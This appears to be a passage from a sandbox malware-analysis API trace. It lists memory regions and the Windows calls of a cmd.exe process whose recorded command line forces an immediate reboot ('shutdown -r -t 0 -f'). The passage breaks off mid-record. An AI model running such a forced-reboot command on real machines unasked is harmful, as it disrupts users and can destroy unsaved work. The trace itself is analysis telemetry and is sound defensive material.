"winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" Region: id = 1310 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1311 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1312 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1313 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1314 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1315 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1316 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1317 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1318 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1319 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1320 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1321 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1322 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1323 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1324 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1325 start_va = 0x590000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1326 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1327 start_va = 0x12a0000 end_va = 0x152afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Thread: id = 116 os_tid = 0x65c [0229.287] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe68 | out: lpSystemTimeAsFileTime=0x26fe68*(dwLowDateTime=0xe38903e0, dwHighDateTime=0x1d204ef)) [0229.287] GetCurrentProcessId () returned 0x660 [0229.287] GetCurrentThreadId () returned 0x65c [0229.287] GetTickCount () returned 0x40a1d [0229.287] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe60 | out: lpPerformanceCount=0x26fe60*=16438686190547) returned 1 [0229.288] GetModuleHandleA (lpModuleName=0x0) returned 0x4a810000 [0229.288] __set_app_type (_Type=0x1) [0229.288] __p__fmode () returned 0x770131f4 [0229.288] __p__commode () returned 0x770131fc [0229.288] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8321a6) returned 0x0 [0229.288] __getmainargs (in: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c, _DoWildCard=0, _StartInfo=0x4a834140 | out: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c) returned 0 [0229.289] GetCurrentThreadId () returned 0x65c [0229.289] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x65c) returned 0x38 [0229.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0229.289] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadUILanguage") returned 0x759524c2 [0229.289] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.289] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0229.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fdf8 | out: phkResult=0x26fdf8*=0x0) returned 0x2 [0229.289] VirtualQuery (in: lpAddress=0x26fe2f, lpBuffer=0x26fdc8, dwLength=0x1c | out: lpBuffer=0x26fdc8*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0229.289] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fdc8, dwLength=0x1c | out: lpBuffer=0x26fdc8*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0229.289] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fdc8, dwLength=0x1c | out: lpBuffer=0x26fdc8*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0229.289] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fdc8, dwLength=0x1c | out: lpBuffer=0x26fdc8*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0229.289] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fdc8, dwLength=0x1c | out: lpBuffer=0x26fdc8*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0229.289] GetConsoleOutputCP () returned 0x1b5 [0229.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.290] SetConsoleCtrlHandler (HandlerRoutine=0x4a82e72a, Add=1) returned 1 [0229.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0229.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.290] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0229.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0229.290] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0229.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.291] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0229.291] GetEnvironmentStringsW () returned 0x2f0250 [0229.291] FreeEnvironmentStringsW (penv=0x2f0250) returned 1 [0229.292] GetEnvironmentStringsW () returned 0x2f0250 [0229.292] FreeEnvironmentStringsW (penv=0x2f0250) returned 1 [0229.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed68 | out: phkResult=0x26ed68*=0x40) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x0, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x1, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x1, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x0, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x40, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x40, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x40, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.292] RegCloseKey (hKey=0x40) returned 0x0 [0229.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed68 | out: phkResult=0x26ed68*=0x40) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x40, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x1, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x1, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.293] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x0, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.293] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x9, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.293] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x4, lpData=0x26ed74*=0x9, lpcbData=0x26ed6c*=0x4) returned 0x0 [0229.293] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed70, lpData=0x26ed74, lpcbData=0x26ed6c*=0x1000 | out: lpType=0x26ed70*=0x0, lpData=0x26ed74*=0x9, lpcbData=0x26ed6c*=0x1000) returned 0x2 [0229.293] RegCloseKey (hKey=0x40) returned 0x0 [0229.293] time (in: timer=0x0 | out: timer=0x0) returned 0x57c9314e [0229.293] srand (_Seed=0x57c9314e) [0229.293] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k shutdown -r -t 0 -f" [0229.293] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k shutdown -r -t 0 -f" [0229.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.293] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1d58, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0229.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0229.294] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0229.294] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0229.294] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0229.294] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0229.294] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0229.294] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0229.294] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0229.294] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0229.294] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0229.294] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0229.294] GetEnvironmentStringsW () returned 0x2f0250 [0229.294] FreeEnvironmentStringsW (penv=0x2f0250) returned 1 [0229.294] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.295] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0229.295] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0229.295] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0229.295] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0229.295] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0229.295] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0229.295] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0229.295] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0229.295] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0229.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb34 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26fb34, lpFilePart=0x26fb30 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26fb30*="system32") returned 0x13 [0229.295] GetFileAttributesW (lpFileName="C:\\Windows\\system32") returned 0x10 [0229.295] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f8b0 | out: lpFindFileData=0x26f8b0) returned 0x2e07f0 [0229.295] FindClose (in: hFindFile=0x2e07f0 | out: hFindFile=0x2e07f0) returned 1 [0229.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f8b0 | out: lpFindFileData=0x26f8b0) returned 0x2e07f0 [0229.296] FindClose (in: hFindFile=0x2e07f0 | out: hFindFile=0x2e07f0) returned 1 [0229.296] GetFileAttributesW (lpFileName="C:\\Windows\\System32") returned 0x10 [0229.296] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0229.296] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0229.296] GetEnvironmentStringsW () returned 0x2f0250 [0229.296] FreeEnvironmentStringsW (penv=0x2f0250) returned 1 [0229.296] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.297] GetConsoleOutputCP () returned 0x1b5 [0229.297] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.297] GetUserDefaultLCID () returned 0x409 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a834950, cchData=8 | out: lpLCData=":") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc74, cchData=128 | out: lpLCData="0") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc74, cchData=128 | out: lpLCData="0") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc74, cchData=128 | out: lpLCData="1") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a834940, cchData=8 | out: lpLCData="/") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a834d80, cchData=32 | out: lpLCData="Mon") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a834d40, cchData=32 | out: lpLCData="Tue") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a834d00, cchData=32 | out: lpLCData="Wed") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a834cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a834c80, cchData=32 | out: lpLCData="Fri") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a834c40, cchData=32 | out: lpLCData="Sat") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a834c00, cchData=32 | out: lpLCData="Sun") returned 4 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a834930, cchData=8 | out: lpLCData=".") returned 2 [0229.298] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a834920, cchData=8 | out: lpLCData=",") returned 2 [0229.298] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0229.300] GetConsoleTitleW (in: lpConsoleTitle=0x2f28e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.300] GetFileType (hFile=0x7) returned 0x2 [0229.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.300] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fd70 | out: lpMode=0x26fd70) returned 1 [0229.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.300] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26fd8c | out: lpConsoleScreenBufferInfo=0x26fd8c) returned 1 [0229.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.301] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26fd58 | out: lpConsoleScreenBufferInfo=0x26fd58) returned 1 [0229.301] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x26fd70 | out: lpNumberOfAttrsWritten=0x26fd70) returned 1 [0229.301] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0229.301] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0229.301] GetProcAddress (hModule=0x75900000, lpProcName="CopyFileExW") returned 0x7593ac6c [0229.301] GetProcAddress (hModule=0x75900000, lpProcName="IsDebuggerPresent") returned 0x75943ea8 [0229.302] GetProcAddress (hModule=0x75900000, lpProcName="SetConsoleInputExeNameW") returned 0x75952732 [0229.303] _wcsicmp (_String1="shutdown", _String2=")") returned 74 [0229.303] _wcsicmp (_String1="FOR", _String2="shutdown") returned -13 [0229.303] _wcsicmp (_String1="FOR/?", _String2="shutdown") returned -13 [0229.303] _wcsicmp (_String1="IF", _String2="shutdown") returned -10 [0229.303] _wcsicmp (_String1="IF/?", _String2="shutdown") returned -10 [0229.303] _wcsicmp (_String1="REM", _String2="shutdown") returned -1 [0229.303] _wcsicmp (_String1="REM/?", _String2="shutdown") returned -1 [0229.304] GetConsoleTitleW (in: lpConsoleTitle=0x26f96c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.305] _wcsicmp (_String1="shutdown", _String2="DIR") returned 15 [0229.305] _wcsicmp (_String1="shutdown", _String2="ERASE") returned 14 [0229.305] _wcsicmp (_String1="shutdown", _String2="DEL") returned 15 [0229.305] _wcsicmp (_String1="shutdown", _String2="TYPE") returned -1 [0229.305] _wcsicmp (_String1="shutdown", _String2="COPY") returned 16 [0229.305] _wcsicmp (_String1="shutdown", _String2="CD") returned 16 [0229.305] _wcsicmp (_String1="shutdown", _String2="CHDIR") returned 16 [0229.305] _wcsicmp (_String1="shutdown", _String2="RENAME") returned 1 [0229.305] _wcsicmp (_String1="shutdown", _String2="REN") returned 1 [0229.305] _wcsicmp (_String1="shutdown", _String2="ECHO") returned 14 [0229.305] _wcsicmp (_String1="shutdown", _String2="SET") returned 3 [0229.305] _wcsicmp (_String1="shutdown", _String2="PAUSE") returned 3 [0229.305] _wcsicmp (_String1="shutdown", _String2="DATE") returned 15 [0229.305] _wcsicmp (_String1="shutdown", _String2="TIME") returned -1 [0229.305] _wcsicmp (_String1="shutdown", _String2="PROMPT") returned 3 [0229.305] _wcsicmp (_String1="shutdown", _String2="MD") returned 6 [0229.305] _wcsicmp (_String1="shutdown", _String2="MKDIR") returned 6 [0229.305] _wcsicmp (_String1="shutdown", _String2="RD") returned 1 [0229.305] _wcsicmp (_String1="shutdown", _String2="RMDIR") returned 1 [0229.305] _wcsicmp (_String1="shutdown", _String2="PATH") returned 3 [0229.305] _wcsicmp (_String1="shutdown", _String2="GOTO") returned 12 [0229.306] _wcsicmp (_String1="shutdown", _String2="SHIFT") returned 12 [0229.306] _wcsicmp (_String1="shutdown", _String2="CLS") returned 16 [0229.306] _wcsicmp (_String1="shutdown", _String2="CALL") returned 16 [0229.306] _wcsicmp (_String1="shutdown", _String2="VERIFY") returned -3 [0229.306] _wcsicmp (_String1="shutdown", _String2="VER") returned -3 [0229.306] _wcsicmp (_String1="shutdown", _String2="VOL") returned -3 [0229.306] _wcsicmp (_String1="shutdown", _String2="EXIT") returned 14 [0229.306] _wcsicmp (_String1="shutdown", _String2="SETLOCAL") returned 3 [0229.306] _wcsicmp (_String1="shutdown", _String2="ENDLOCAL") returned 14 [0229.306] _wcsicmp (_String1="shutdown", _String2="TITLE") returned -1 [0229.306] _wcsicmp (_String1="shutdown", _String2="START") returned -12 [0229.306] _wcsicmp (_String1="shutdown", _String2="DPATH") returned 15 [0229.306] _wcsicmp (_String1="shutdown", _String2="KEYS") returned 8 [0229.306] _wcsicmp (_String1="shutdown", _String2="MOVE") returned 6 [0229.306] _wcsicmp (_String1="shutdown", _String2="PUSHD") returned 3 [0229.306] _wcsicmp (_String1="shutdown", _String2="POPD") returned 3 [0229.306] _wcsicmp (_String1="shutdown", _String2="ASSOC") returned 18 [0229.306] _wcsicmp (_String1="shutdown", _String2="FTYPE") returned 13 [0229.306] _wcsicmp (_String1="shutdown", _String2="BREAK") returned 17 [0229.306] _wcsicmp (_String1="shutdown", _String2="COLOR") returned 16 [0229.306] _wcsicmp (_String1="shutdown", _String2="MKLINK") returned 6 [0229.306] _wcsicmp (_String1="shutdown", _String2="DIR") returned 15 [0229.306] _wcsicmp (_String1="shutdown", _String2="ERASE") returned 14 [0229.306] _wcsicmp (_String1="shutdown", _String2="DEL") returned 15 [0229.306] _wcsicmp (_String1="shutdown", _String2="TYPE") returned -1 [0229.306] _wcsicmp (_String1="shutdown", _String2="COPY") returned 16 [0229.306] _wcsicmp (_String1="shutdown", _String2="CD") returned 16 [0229.306] _wcsicmp (_String1="shutdown", _String2="CHDIR") returned 16 [0229.307] _wcsicmp (_String1="shutdown", _String2="RENAME") returned 1 [0229.307] _wcsicmp (_String1="shutdown", _String2="REN") returned 1 [0229.307] _wcsicmp (_String1="shutdown", _String2="ECHO") returned 14 [0229.307] _wcsicmp (_String1="shutdown", _String2="SET") returned 3 [0229.307] _wcsicmp (_String1="shutdown", _String2="PAUSE") returned 3 [0229.307] _wcsicmp (_String1="shutdown", _String2="DATE") returned 15 [0229.307] _wcsicmp (_String1="shutdown", _String2="TIME") returned -1 [0229.307] _wcsicmp (_String1="shutdown", _String2="PROMPT") returned 3 [0229.307] _wcsicmp (_String1="shutdown", _String2="MD") returned 6 [0229.307] _wcsicmp (_String1="shutdown", _String2="MKDIR") returned 6 [0229.307] _wcsicmp (_String1="shutdown", _String2="RD") returned 1 [0229.307] _wcsicmp (_String1="shutdown", _String2="RMDIR") returned 1 [0229.307] _wcsicmp (_String1="shutdown", _String2="PATH") returned 3 [0229.307] _wcsicmp (_String1="shutdown", _String2="GOTO") returned 12 [0229.307] _wcsicmp (_String1="shutdown", _String2="SHIFT") returned 12 [0229.307] _wcsicmp (_String1="shutdown", _String2="CLS") returned 16 [0229.307] _wcsicmp (_String1="shutdown", _String2="CALL") returned 16 [0229.307] _wcsicmp (_String1="shutdown", _String2="VERIFY") returned -3 [0229.307] _wcsicmp (_String1="shutdown", _String2="VER") returned -3 [0229.307] _wcsicmp (_String1="shutdown", _String2="VOL") returned -3 [0229.307] _wcsicmp (_String1="shutdown", _String2="EXIT") returned 14 [0229.307] _wcsicmp (_String1="shutdown", _String2="SETLOCAL") returned 3 [0229.307] _wcsicmp (_String1="shutdown", _String2="ENDLOCAL") returned 14 [0229.307] _wcsicmp (_String1="shutdown", _String2="TITLE") returned -1 [0229.307] _wcsicmp (_String1="shutdown", _String2="START") returned -12 [0229.307] _wcsicmp (_String1="shutdown", _String2="DPATH") returned 15 [0229.307] _wcsicmp (_String1="shutdown", _String2="KEYS") returned 8 [0229.307] _wcsicmp (_String1="shutdown", _String2="MOVE") returned 6 [0229.308] _wcsicmp (_String1="shutdown", _String2="PUSHD") returned 3 [0229.308] _wcsicmp (_String1="shutdown", _String2="POPD") returned 3 [0229.308] _wcsicmp (_String1="shutdown", _String2="ASSOC") returned 18 [0229.308] _wcsicmp (_String1="shutdown", _String2="FTYPE") returned 13 [0229.308] _wcsicmp (_String1="shutdown", _String2="BREAK") returned 17 [0229.308] _wcsicmp (_String1="shutdown", _String2="COLOR") returned 16 [0229.308] _wcsicmp (_String1="shutdown", _String2="MKLINK") returned 6 [0229.308] _wcsicmp (_String1="shutdown", _String2="FOR") returned 13 [0229.308] _wcsicmp (_String1="shutdown", _String2="IF") returned 10 [0229.308] _wcsicmp (_String1="shutdown", _String2="REM") returned 1 [0229.308] _wcsnicmp (_String1="shutdown", _String2="cmd ", _MaxCount=0x4) returned 16 [0229.309] SetErrorMode (uMode=0x0) returned 0x0 [0229.309] SetErrorMode (uMode=0x1) returned 0x0 [0229.309] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e07f8, lpFilePart=0x26f48c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f48c*="system32") returned 0x13 [0229.309] SetErrorMode (uMode=0x0) returned 0x1 [0229.309] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0229.309] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.320] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0229.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.326] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\shutdown.*", fInfoLevelId=0x1, lpFindFileData=0x26f208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f208) returned 0x2f30d8 [0229.326] FindClose (in: hFindFile=0x2f30d8 | out: 